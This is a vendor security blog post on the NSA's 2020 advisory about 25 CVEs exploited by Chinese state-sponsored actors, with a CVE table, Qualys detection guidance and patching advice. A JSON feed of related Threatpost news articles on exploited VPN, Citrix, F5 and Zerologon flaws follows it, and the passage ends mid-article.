On October 20, 2020, the United States National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) on Chinese state-sponsored malicious cyber activity. The NSA alert provided a list of 25 publicly known vulnerabilities that are known to be recently leveraged by cyber actors for various hacking operations.
"Since these techniques include exploitation of publicly known vulnerabilities, it is critical that network defenders prioritize patching and
mitigation efforts," said the NSA advisory. It also recommended "critical system owners consider these actions a priority, in order to mitigate the loss of sensitive information that could impact U.S. policies, strategies, plans, and competitive advantage."
Earlier this year, the NSA also announced Sandworm actors exploiting the [Exim MTA Vulnerability](<https://blog.qualys.com/product-tech/2020/05/29/nsa-announces-sandworm-actors-exploiting-exim-mta-vulnerability-cve-2019-10149>). Similar alerts have been published by the Cybersecurity and Infrastructure Security Agency (CISA) over the last year. CISA also issued an [advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>) notifying about vulnerabilities that were exploited in the wild to retrieve sensitive data such as intellectual property, economic, political, and military information.
Here is a list of 25 publicly known vulnerabilities (CVEs) published by the NSA, along affected products and associated Qualys VMDR QID(s) for each vulnerability:
**CVE-ID(s)**| **Affected products**| **Qualys QID(s)**
---|---|---
CVE-2020-5902| Big-IP devices| 38791, 373106
CVE-2019-19781| Citrix Application Delivery Controller
Citrix Gateway
Citrix SDWAN WANOP| 150273, 372305, 372685
CVE-2019-11510| Pulse Connect Secure| 38771
CVE-2020-8193
CVE-2020-8195
CVE-2020-8196| Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18
Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7| 13833, 373116
CVE-2019-0708| Microsoft Windows multiple products| 91541, 91534
CVE-2020-15505| MobileIron Core & Connector| 13998
CVE-2020-1350| Microsoft Windows multiple products| 91662
CVE-2020-1472| Microsoft Windows multiple products| 91688
CVE-2019-1040| Microsoft Windows multiple products| 91653
CVE-2018-6789| Exim before 4.90.1| 50089
CVE-2020-0688| Multiple Microsoft Exchange Server| 50098
CVE-2018-4939| Adobe ColdFusion| 370874
CVE-2015-4852| Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0| 86362, 86340
CVE-2020-2555| Oracle Coherence product of Oracle Fusion Middleware Middleware; versions 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.| 372345
CVE-2019-3396| Atlassian Confluence Server before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3), and from version 6.14.0 before 6.14.2| 13459
CVE-2019-11580| Atlassian Crowd and Crowd Data Center| 13525
CVE-2020-10189| Zoho ManageEngine Desktop Central before 10.0.474| 372442
CVE-2019-18935| Progress Telerik UI for ASP.NET AJAX through 2019.3.1023| 372327, 150299
CVE-2020-0601| Microsoft Windows multiple products| 91595
CVE-2019-0803| Microsoft Windows multiple products| 91522
CVE-2017-6327| Symantec Messaging Gateway before 10.6.3-267| 11856
CVE-2020-3118| Cisco IOS XR, NCS| 316792
CVE-2020-8515| DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices| 13730
## Detect 25 Publicly Known Vulnerabilities using VMDR
Qualys released several remote and authenticated QIDs for commonly exploited vulnerabilities. You can search for these QIDs in VMDR Dashboard by using the following QQL query:
_vulnerabilities.vulnerability.cveIds: [CVE-2019-11510,CVE-2020-5902,CVE-2019-19781,CVE-2020-8193,CVE-2020-8195,CVE-2020-8196,CVE-2019-0708,CVE-2020-15505,CVE-2020-1472,CVE-2019-1040,CVE-2020-1350,CVE-2018-6789,CVE-2018-4939,CVE-2020-0688,CVE-2015-4852,CVE-2020-2555,CVE-2019-3396,CVE-2019-11580,CVE-2020-10189,CVE-2019-18935,CVE-2020-0601,CVE-2019-0803,CVE-2017-6327,CVE-2020-3118,CVE-2020-8515]_
* 
Using [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize this vulnerability for "Active Attack" RTI:
### Identify Vulnerable Assets using Qualys Threat Protection
In addition, Qualys customers can locate vulnerable host through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) by simply clicking on the impacted hosts. This helps in effectively identifying and tracking this vulnerability.
With VMDR Dashboard, you can track 25 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the ["NSA's Top 25 Vulnerabilities from China" dashboard](<https://qualys-secure.force.com/customer/s/article/000006429>).
### **Recommendations**
As guided by CISA, to protect assets from exploiting, one must do the following:
* Minimize gaps in personnel availability and consistently consume relevant threat intelligence.
* Vigilance team of an organization should keep a close eye on indications of compromise (IOCs) as well as strict reporting processes.
* Regular incident response exercises at the organizational level are always recommended as a proactive approach.
#### **Remediation and Mitigation**
* Patch systems and equipment promptly and diligently.
* Implement rigorous configuration management programs.
* Disable unnecessary ports, protocols, and services.
* Enhance monitoring of network and email traffic.
* Use protection capabilities to stop malicious activity.
### Get Started Now
Start your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching the high-priority commonly exploited vulnerabilities.
### References
<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>
<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>
<https://us-cert.cisa.gov/ncas/current-activity/2020/10/20/nsa-releases-advisory-chinese-state-sponsored-actors-exploiting>
{"threatpost": [{"lastseen": "2020-10-22T15:51:14", "description": "Chinese state-sponsored cyberattackers are actively compromising U.S. targets using a raft of known security vulnerabilities \u2013 with a Pulse VPN flaw claiming the dubious title of \u201cmost-favored bug\u201d for these groups.\n\nThat\u2019s according to the National Security Agency (NSA), which released a \u201ctop 25\u201d list of the exploits that are used the most by China-linked advanced persistent threats (APT), which include the likes of [Cactus Pete](<https://threatpost.com/cactuspete-apt-toolset-respionage-targets/158350/>), [TA413,](<https://threatpost.com/chinese-apt-sepulcher-malware-phishing-attacks/158871/>) [Vicious Panda](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>) and [Winniti](<https://threatpost.com/black-hat-linux-spyware-stack-chinese-apts/158092/>).\n\nThe Feds [warned in September](<https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/>) that Chinese threat actors had successfully compromised several government and private sector entities in recent months; the NSA is now driving the point home about the need to patch amid this flurry of heightened activity.[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cMany of these vulnerabilities can be used to gain initial access to victim networks by exploiting products that are directly accessible from the internet,\u201d warned the NSA, in its Tuesday [advisory](<https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2387347/nsa-warns-chinese-state-sponsored-malicious-cyber-actors-exploiting-25-cves/>). \u201cOnce a cyber-actor has established a presence on a network from one of these remote exploitation vulnerabilities, they can use other vulnerabilities to further exploit the network from the inside.\u201d\n\nAPTs \u2013 Chinese and otherwise \u2013 have ramped up their cyberespionage efforts in the wake of the pandemic as well as in the leadup to the U.S. elections next month. But Chlo\u00e9 Messdaghi, vice president of strategy at Point3 Security, noted that these vulnerabilities contribute to an ongoing swell of attacks.\n\n\u201cWe definitely saw an increase in this situation last year and it\u2019s ongoing,\u201d she said. \u201cThey\u2019re trying to collect intellectual property data. Chinese attackers could be nation-state, could be a company or group of companies, or just a group of threat actors or an individual trying to get proprietary information to utilize and build competitive companies\u2026in other words, to steal and use for their own gain.\u201d\n\n## **Pulse Secure, BlueKeep, Zerologon and More**\n\nPlenty of well-known and infamous bugs made the NSA\u2019s Top 25 cut. For instance, a notorious Pulse Secure VPN bug (CVE-2019-11510) is the first flaw on the list.\n\nIt\u2019s an [arbitrary file-reading flaw](<https://www.tenable.com/blog/cve-2019-11510-critical-pulse-connect-secure-vulnerability-used-in-sodinokibi-ransomware>) that opens systems to exploitation from remote, unauthenticated attackers. In April of this year, the Department of Homeland Security\u2019s Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) attackers are actively using the issue to steal passwords to infiltrate corporate networks. And in fact, this is the bug at the heart of the [Travelex ransomware fiasco](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) that hit in January.\n\nPulse Secure issued a patch in April 2019, but many companies impacted by the flaw still haven\u2019t applied it, CISA warned.\n\nAnother biggie for foreign adversaries is a critical flaw in F5 BIG-IP 8 proxy/load balancer devices ([CVE-2020-5902](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>)). This remote code-execution (RCE) bug exists in the Traffic Management User Interface (TMUI) of the device that\u2019s used for configuration. It allows complete control of the host machine upon exploitation, enabling interception and redirection of web traffic, decryption of traffic destined for web servers, and serving as a hop-point into other areas of the network.\n\nAt the end of June, F5 issued urgent patches the bug, which has a CVSS severity score of 10 out of 10 \u201cdue to its lack of complexity, ease of attack vector, and high impacts to confidentiality, integrity and availability,\u201d researchers said at the time. Thousands of devices were shown to be vulnerable in a Shodan search in July.\n\nThe NSA also flagged several vulnerabilities in Citrix as being Chinese faves, including CVE-2019-19781, which was revealed last holiday season. The bug exists in the Citrix Application Delivery Controller (ADC) and Gateway, a purpose-built networking appliance meant to improve the performance and security of applications delivered over the web. An exploit can lead to RCE without credentials.\n\nWhen it was originally disclosed in December, the vulnerability did not have a patch, and Citrix had to [scramble to push fixes out](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) \u2013 but not before public proof-of-concept (PoC) exploit code emerged, along with active exploitations and mass scanning activity for the vulnerable Citrix products.\n\nOther Citrix bugs in the list include CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196.\n\nMeanwhile, Microsoft bugs are well-represented, including the [BlueKeep RCE bug](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) in Remote Desktop Services (RDP), which is still under active attack a year after disclosure. The bug tracked as CVE-2019-0708 can be exploited by an unauthenticated attacker connecting to the target system using RDP, to send specially crafted requests and execute code. The issue with BlueKeep is that researchers believe it to be wormable, which could lead to a WannaCry-level disaster, they have said.\n\nAnother bug-with-a-name on the list is [Zerologon](<https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/>), the privilege-escalation vulnerability that allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. It was patched in August, but many organizations remain vulnerable, and the DHS recently [issued a dire warning](<https://threatpost.com/dire-patch-warning-zerologon/159404/>) on the bug amid a tsunami of attacks.\n\nThe very first bug ever reported to Microsoft by the NSA, CVE-2020-0601, is also being favored by Chinese actors. This spoofing vulnerability, [patched in January,](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>) exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear that the file was from a trusted, legitimate source.\n\nTwo proof-of-concept (PoC) exploits were publicly released just a week after Microsoft\u2019s January Patch Tuesday security bulletin addressed the flaw.\n\nThen there\u2019s a high-profile Microsoft Exchange validation key RCE bug ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)), which stems from the server failing to properly create unique keys at install time.\n\nIt was fixed as part of Microsoft\u2019s [February Patch Tuesday](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) updates \u2013 and [admins in March were warned](<https://threatpost.com/microsoft-exchange-server-flaw-exploited-in-apt-attacks/153527/>) that unpatched servers are being exploited in the wild by unnamed APT actors. But as of Sept. 30, at least 61 percent of Exchange 2010, 2013, 2016 and 2019 servers [were still vulnerable](<https://threatpost.com/microsoft-exchange-exploited-flaw/159669/>) to the flaw.\n\n## **The Best of the Rest**\n\nThe NSA\u2019s Top 25 list covers plenty of ground, including a [nearly ubiquitous RCE bug](<https://threatpost.com/critical-microsoft-rce-bugs-windows/145572/>) (CVE-2019-1040) that, when disclosed last year, affected all versions of Windows. It allows a man-in-the-middle attacker to bypass the NTLM Message Integrity Check protection.\n\nHere\u2019s a list of the other flaws:\n\n * CVE-2018-4939 in certain Adobe ColdFusion versions.\n * CVE-2020-2555 in the Oracle Coherence product in Oracle Fusion Middleware.\n * CVE-2019-3396 in the Widget Connector macro in Atlassian Confluence Server\n * CVE-2019-11580 in Atlassian Crowd or Crowd Data Center\n * CVE-2020-10189 in Zoho ManageEngine Desktop Central\n * CVE-2019-18935 in Progress Telerik UI for ASP.NET AJAX.\n * CVE-2019-0803 in Windows, a privilege-escalation issue in the Win32k component\n * CVE-2020-3118 in the Cisco Discovery Protocol implementation for Cisco IOS XR Software\n * CVE-2020-8515 in DrayTek Vigor devices\n\nThe advisory also covers three older bugs: One in Exim mail transfer (CVE-2018-6789); one in Symantec Messaging Gateway (CVE-2017-6327); and one in the WLS Security component in Oracle WebLogic Server (CVE-2015-4852).\n\n\u201cWe hear loud and clear that it can be hard to prioritize patching and mitigation efforts,\u201d NSA Cybersecurity Director Anne Neuberger said in a media statement. \u201cWe hope that by highlighting the vulnerabilities that China is actively using to compromise systems, cybersecurity professionals will gain actionable information to prioritize efforts and secure their systems.\u201d\n", "cvss3": {}, "published": "2020-10-21T20:31:17", "type": "threatpost", "title": "Bug Parade: NSA Warns on Cresting China-Backed Cyberattacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "modified": "2020-10-21T20:31:17", "id": "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "href": "https://threatpost.com/bug-nsa-china-backed-cyberattacks/160421/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-13T16:45:38", "description": "U.S. government officials have warned that advanced persistent threat actors (APTs) are now leveraging Microsoft\u2019s severe privilege-escalation flaw, dubbed \u201cZerologon,\u201d to target elections support systems.\n\nDays after [Microsoft sounded the alarm that an Iranian nation-state actor](<https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/>) was actively exploiting the flaw ([CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>)), the Cybersecurity Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) published a joint advisory warning of further attacks.\n\nThe advisory details how attackers are chaining together various vulnerabilities and exploits \u2013 including using VPN vulnerabilities to gain initial access and then Zerologon as a post-exploitation method \u2013 to compromise government networks.\n\n[](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\n\nClick to Register!\n\n\u201cThis recent malicious activity has often, but not exclusively, been directed at federal and state, local, tribal and territorial (SLTT) government networks,\u201d according [to the security advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>). \u201cAlthough it does not appear these targets are being selected because of their proximity to elections information, there may be some risk to elections information housed on government networks.\u201d\n\nWith the [U.S. November presidential elections](<https://threatpost.com/2020-election-secure-vote-tallies-problem/158533/>) around the corner \u2013 and cybercriminal activity subsequently ramping up to target [election infrastructure](<https://threatpost.com/black-hat-usa-2020-preview-election-security-covid-disinformation-and-more/157875/>) and [presidential campaigns](<https://threatpost.com/microsoft-cyberattacks-trump-biden-election-campaigns/159143/>) \u2013 election security is top of mind. While the CISA and FBI\u2019s advisory did not detail what type of elections systems were targeted, it did note that there is no evidence to support that the \u201cintegrity of elections data has been compromised.\u201d\n\nMicrosoft released a patch for the Zerologon vulnerability as part of its [August 11, 2020 Patch Tuesday security updates](<https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/>). Exploiting the bug allows an unauthenticated attacker, with network access to a domain controller, to completely compromise all Active Directory identity services, according to Microsoft.\n\nDespite a patch being issued, many companies have not yet applied the patches to their systems \u2013 and cybercriminals are taking advantage of that in a recent slew of government-targeted attacks.\n\nThe CISA and FBI warned that various APT actors are commonly using [a Fortinet vulnerability](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) to gain initial access to companies. That flaw (CVE-2018-13379) is a path-traversal glitch in Fortinet\u2019s FortiOS Secure Socket Layer (SSL) virtual private network (VPN) solution. While the flaw was patched in April 2019, exploitation details were publicized in August 2019, opening the door for attackers to exploit the error.\n\nOther initial vulnerabilities being targeted in the attacks include ones in Citrix NetScaler ([CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)), MobileIron ([CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>)), Pulse Secure ([CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)), Palo Alto Networks ([CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>)) and F5 BIG-IP ([CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)).\n\nAfter exploiting an initial flaw, attackers are then leveraging the Zerologon flaw to escalate privileges, researchers said. They then use legitimate credentials to log in via VPN or remote-access services, in order to maintain persistence.\n\n\u201cThe actors are leveraging CVE-2020-1472 in Windows Netlogon to escalate privileges and obtain access to Windows AD servers,\u201d they said. \u201cActors are also leveraging the opensource tools such as Mimikatz and the CrackMapExec tool to obtain valid account credentials from AD servers.\u201d\n\nThe advisory comes as exploitation attempts against Zerologon spike, with Microsoft recently warned of exploits by an [advanced persistent threat](<https://threatpost.com/iranian-apt-targets-govs-with-new-malware/153162/>) (APT) actor, which the company calls MERCURY (also known as MuddyWater, Static Kitten and Seedworm). [Cisco Talos researchers also recently warned of](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) a spike in exploitation attempts against Zerologon.\n\n[Earlier in September, the stakes got higher](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for risks tied to the bug when four public proof-of-concept exploits for the flaw were released on** **[Github.](<https://github.com/dirkjanm/CVE-2020-1472>) This spurred the Secretary of Homeland Security [to issue a rare emergency directive](<https://threatpost.com/dire-patch-warning-zerologon/159404/>), ordering federal agencies to patch their Windows Servers against the flaw by Sept. 2.\n\nCISA and the FBI stressed that organizations should ensure their systems are patched, and adopt an \u201cassume breach\u201d mentality. Satnam Narang, staff research engineer with Tenable, agreed, saying that \u201cit seems clear that Zerologon is becoming one of the most critical vulnerabilities of 2020.\u201d\n\n\u201cPatches are available for all of the vulnerabilities referenced in the joint cybersecurity advisory from CISA and the FBI,\u201d said Narang [in a Monday analysis](<https://www.tenable.com/blog/cve-2020-1472-advanced-persistent-threat-actors-use-zerologon-vulnerability-in-exploit-chain>). \u201cMost of the vulnerabilities had patches available for them following their disclosure, with the exception of CVE-2019-19781, which received patches a month after it was originally disclosed.\u201d\n\n** [On October 14 at 2 PM ET](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) Get the latest information on the rising threats to retail e-commerce security and how to stop them. [Register today](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) for this FREE Threatpost webinar, \u201c[Retail Security: Magecart and the Rise of e-Commerce Threats.](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this [LIVE ](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)webinar.**\n", "cvss3": {}, "published": "2020-10-13T16:39:01", "type": "threatpost", "title": "Election Systems Under Attack via Microsoft Zerologon Exploits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2021", "CVE-2020-5902"], "modified": "2020-10-13T16:39:01", "id": "THREATPOST:71C45E867DCD99278A38088B59938B48", "href": "https://threatpost.com/election-systems-attack-microsoft-zerologon/160021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:19:31", "description": "The U.S. government is warning that Chinese threat actors have successfully compromised several government and private sector entities in recent months, by exploiting vulnerabilities in F5 BIG-IP devices, Citrix and Pulse Secure VPNs and Microsoft Exchange servers.\n\nPatches are currently available for all these flaws \u2013 and in some cases, have been available for over a year \u2013 however, the targeted organizations had not yet updated their systems, leaving them vulnerable to compromise, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said in a Monday advisory. CISA claims the attacks were launched by threat actors affiliated with the Chinese Ministry of State Security.\n\n[](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)\n\nClick to Register\n\n\u201cCISA and the FBI also recommend that organizations routinely audit their configuration and patch management programs to ensure they can track and mitigate emerging threats,\u201d according to a [Monday CISA advisory](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-258A-Chinese_Ministry_of_State_Security-Affiliated_Cyber_Threat_Actor_Activity_S508C.pdf>). \u201cImplementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors\u2019 operations and protect organizations\u2019 resources and information systems.\u201d\n\nNo further details on the specific hacked entities were made public. The threat actors have been spotted successfully exploiting two common vulnerabilities \u2013 allowing them to compromise federal government and commercial entities, according to CISA.\n\nThe first is a vulnerability (CVE-2020-5902) in [F5\u2019s Big-IP Traffic Management User Interface](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>), which allows cyber threat actors to execute arbitrary system commands, create or delete files, disable services, and/or execute Java code. As of July, about 8,000 users of F5 Networks\u2019 BIG-IP family of networking devices [were still vulnerable](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>) to the critical flaw.\n\nFeds also observed the attackers exploiting an [arbitrary file reading vulnerability](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) affecting Pulse Secure VPN appliances (CVE-2019-11510). This flaw \u2013 speculated to be the [cause of the Travelex breach](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) earlier this year \u2013 allows bad actors to gain access to victim networks.\n\n\u201cAlthough Pulse Secure released patches for CVE-2019-11510 in April 2019, CISA observed incidents where [compromised Active Directory credentials](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) were used months after the victim organization patched their VPN appliance,\u201d according to the advisory.\n\nThreat actors were also observed hunting for [Citrix VPN Appliances](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) vulnerable to CVE-2019-19781, which is a flaw that enables attackers to execute directory traversal attacks. And, they have also been observed attempting to exploit a [Microsoft Exchange server](<https://threatpost.com/serious-exchange-flaw-still-plagues-350k-servers/154548/>) remote code execution flaw (CVE-2020-0688) that allows attackers to collect emails of targeted networks.\n\nAs part of its advisory, CISA also identified common TTPs utilized by the threat actors. For instance, threat actors have been spotted using [the Cobalt Strike commercial penetration testing tool](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) to target commercial and federal government networks; they have also seen the actors successfully deploying the [open-source China Chopper tool](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>) against organization networks and using [open-source tool Mimikatz](<https://threatpost.com/wipro-attackers-under-radar/144276/>).\n\nThe initial access vector for these cyberattacks vary. CISA said it has observed threat actors utilize malicious links in spearphishing emails, as well as exploit public facing applications. In one case, CISA observed the threat actors scanning a federal government agency for vulnerable web servers, as well as scanning for known vulnerabilities in network appliances (CVE-2019-11510). CISA also observed threat actors scanning and performing reconnaissance of federal government internet-facing systems shortly after the disclosure of \u201csignificant CVEs.\u201d\n\nCISA said, maintaining a rigorous patching cycle continues to be the best defense against these attacks.\n\n\u201cIf critical vulnerabilities remain unpatched, cyber threat actors can carry out attacks without the need to develop custom malware and exploits or use previously unknown vulnerabilities to target a network,\u201d according to the advisory.\n\nTerence Jackson, CISO at Thycotic, echoed this recommendation, saying the advisory sheds light on the fact that organizations need to keep up with patch management. In fact, he said, according to a recent [Check Point report](<https://www.checkpoint.com/downloads/resources/cyber-attack-trends-report-mid-year-2020.pdf?mkt_tok=eyJpIjoiTldNM05UWTJOelEwTnpZeCIsInQiOiJTSVY0QTBcL0d1UnpKcXM1UzZRRnRRV1RBV1djcnArM3BWK0VrUlQyb2JFVkJka05EWFhGOFpSSVJOZGszcnlpVFNVNVBwSjZDRXNxZGdkTGRKQzJJem4yYWlBQXJERUdkNDNrZEJDWGxNVUZ3WWt5K25vc2trRnNPNFZaY3JzOE8ifQ%3D%3D>), 80 percent of observed ransomware attacks in the first half of 2020 used vulnerabilities reported and registered in 2017 and earlier \u2013 and more than 20 percent of the attacks used vulnerabilities that are at least seven years old.\n\n\u201cPatch management is one of the fundamentals of security, however, it is difficult and we are still receiving a failing grade. Patch management, enforcing MFA and least privilege are key to preventing cyber-attacks in both the public and private sectors,\u201d he told Threatpost.\n\n[**On Wed Sept. 16 @ 2 PM ET:**](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)** Learn the secrets to running a successful Bug Bounty Program. **[**Register today**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** for this FREE Threatpost webinar \u201c**[**Five Essentials for Running a Successful Bug Bounty Program**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)**\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this **[**LIVE**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** webinar.**\n", "cvss3": {}, "published": "2020-09-14T21:20:46", "type": "threatpost", "title": "Feds Warn Nation-State Hackers are Actively Exploiting Unpatched Microsoft Exchange, F5, VPN Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5135", "CVE-2020-5902"], "modified": "2020-09-14T21:20:46", "id": "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "href": "https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-01T21:47:35", "description": "An APT group known as Pioneer Kitten, linked to Iran, has been spotted selling corporate-network credentials on hacker forums. The credentials would let other cybercriminal groups and APTs perform cyberespionage and other nefarious cyber-activity.\n\nPioneer Kitten is a hacker group that specializes in infiltrating corporate networks using open-source tools to compromise remote external services. Researchers observed an actor associated with the group advertising access to compromised networks on an underground forum in July, according to a [blog post](<https://www.crowdstrike.com/blog/who-is-pioneer-kitten/>) Monday from Alex Orleans, a senior intelligence analyst at CrowdStrike Intelligence.\n\nPioneer Kitten\u2019s work is related to other groups either sponsored or run by the Iranian government, which [were previously seen](<https://www.zdnet.com/article/iranian-hackers-have-been-hacking-vpn-servers-to-plant-backdoors-in-companies-around-the-world/>) hacking VPNs and planting backdoors in companies around the world.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIndeed, the credential sales on hacker forums seem to suggest \u201ca potential attempt at revenue stream diversification\u201d to complement \u201cits targeted intrusions in support of the Iranian government,\u201d Orleans wrote. However, Pioneer Kitten, which has been around since 2017, does not appear to be directly operated by the Iranian government but is rather sympathetic to the regime and likely a private contractor, Orleans noted.\n\nPioneer Kitten\u2019s chief mode of operations is its reliance on SSH tunneling, using open-source tools such as Ngrok and a custom tool called SSHMinion, he wrote. The group uses these tools to communicate \u201cwith implants and hands-on-keyboard activity via Remote Desktop Protocol (RDP)\u201d to exploit vulnerabilities in VPNs and network appliances to do its dirty work, Orleans explained.\n\nCrowdStrike observed the group leveraging several critical exploits in particular \u2014 [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>), and most recently, [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>). All three are exploits affect VPNs and networking equipment, including Pulse Secure \u201cConnect\u201d enterprise VPNs, Citrix servers and network gateways, and F5 Networks BIG-IP load balancers, respectively.\n\nPioneer Kitten\u2019s targets are North American and Israeli organizations in various sectors that represent some type of intelligence interest to the Iranian government, according to CrowdStrike. Target sectors run the gamut and include technology, government, defense, healthcare, aviation, media, academic, engineering, consulting and professional services, chemical, manufacturing, financial services, insurance and retail.\n\nWhile not as well-known or widespread in its activity as other nation-state threats such as China and Russia, Iran has emerged in recent years as a formidable cyber-enemy, amassing a number of APTs to mount attacks on its political adversaries.\n\nOf these, Charming Kitten\u2014which also goes by the names APT35, Ajax or Phosphorus\u2014appears to be the most active and dangerous, while others bearing similar names seem to be 